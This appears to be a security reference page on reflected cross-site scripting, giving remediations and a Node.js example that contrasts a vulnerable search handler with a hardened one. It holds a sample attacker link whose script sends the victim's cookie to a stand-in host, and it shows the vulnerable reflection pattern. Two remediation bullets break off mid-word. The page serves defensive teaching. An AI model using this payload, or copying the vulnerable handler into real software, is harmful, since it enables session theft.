Cross Site Scripting (XSS) - Reflected
Summary
Reflected XSS (rXSS) allows an attacker to inject malicious JavaScript into a web application's response so that it runs in a victim's browser, leading to potential unauthorized access, data theft, or session hijacking.
Description
Reflected Cross Site Scripting (rXSS) allows an attacker to inject malicious JavaScript into a page of a vulnerable web application that a victim then loads. Unlike stored XSS, the payload is not persisted by the vulnerable site. Instead, the attacker must deliver it to the victim directly (e.g. as a crafted link whose URL parameter the application reflects into its response), and when the page loads the script executes in the victim's browser within the origin of the vulnerable site. Because the script runs with the victim's session and origin, it can steal sensitive information, hijack the session, or perform actions on the victim's behalf.
Remediations
- Validate all user input on the server side against the application's expected data type, format and length (allow-list validation where possible). Validation reduces the attack surface but is not sufficient on its own, because it cannot anticipate every output context.
- Encode user-supplied data at the point where it is incorporated into HTML. This makes potentially harmful input safe to display. HTML entities can be used to safely represent characters, avoiding script interpreta
- Fewer XSS bugs appear in applications built with modern web frameworks like React that help mitigate XSS using templating, auto-escaping and more. However, regularly ensure developers aren't b
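The pattern described above, as an added example that is not code from the original page: a minimal Node.js-style search handler that reflects the "q" query parameter straight into HTML, beside a hardened version that applies the two remediations (server-side validation, then HTML entity encoding at the point of output). The handler names, the "q" parameter, the hostnames and the validation rules are illustrative assumptions, and the attacker link is a constructed sample.

```javascript
// Added example, not code from the original page. Handler names, the "q"
// parameter, hostnames and validation rules are illustrative assumptions.

// Encodes the five characters that are significant inside HTML element content
// and double-quoted attributes. Other contexts (JavaScript strings, URLs, CSS)
// need their own, different encoders; this one is only correct for HTML.
function encodeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side validation for a search term (assumed rules): a non-empty string
// of printable characters, no control characters, at most 100 characters.
// Returns null when the input is rejected.
function validateSearchTerm(term) {
  if (typeof term !== 'string' || term.length === 0 || term.length > 100) return null;
  if (/[\u0000-\u001f\u007f]/.test(term)) return null;
  return term;
}

// VULNERABLE: the value of the "q" query parameter is copied verbatim into the
// HTML response, so a crafted link becomes script in the victim's browser.
function renderSearchVulnerable(requestUrl) {
  const q = new URL(requestUrl).searchParams.get('q') ?? '';
  return `<h1>Results for: ${q}</h1>`;
}

// HARDENED: validate first, then entity-encode at the point of insertion.
// Encoding is the defence that actually neutralises the payload; validation
// only narrows what reaches it.
function renderSearchSafe(requestUrl) {
  const raw = new URL(requestUrl).searchParams.get('q') ?? '';
  const q = validateSearchTerm(raw);
  if (q === null) return '<h1>Invalid search term</h1>';
  return `<h1>Results for: ${encodeHtml(q)}</h1>`;
}

// Constructed sample: the kind of link an attacker would send to a victim.
// The payload tries to send the victim's cookie to an attacker-controlled host
// (%2B is a literal "+" so that URL decoding does not turn it into a space).
const attackerLink =
  'https://shop.example/search?q=<script>document.location="https://attacker.example/?c="%2Bdocument.cookie</script>';

console.log('vulnerable:', renderSearchVulnerable(attackerLink));
console.log('hardened:  ', renderSearchSafe(attackerLink));
```

Run with `node`; the first line printed is the response a vulnerable server would send (the injected `<script>` element is intact), the second is the hardened response, where the same input survives only as inert text (`&lt;script&gt;...`). Note that the attacker payload passes the length and control-character validation, which is exactly why output encoding, not validation, has to be the primary control.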
hackstack
Anatomy
Usually follows
Misconfigured CORS
Cross Site Request Forgery (CSRF)
Lack of Security Headers
HTTP Desync
Unrestricted File Upload
CRLF Injection
Usually precedes
Authentication Bypass
Cross Site Scripting (XSS) - Stored
Account Takeover
Open Redirect
Privilege Escalation
Insecure Cookies
Server Side Template Injection (SSTI)
Affected components
Session
Client Side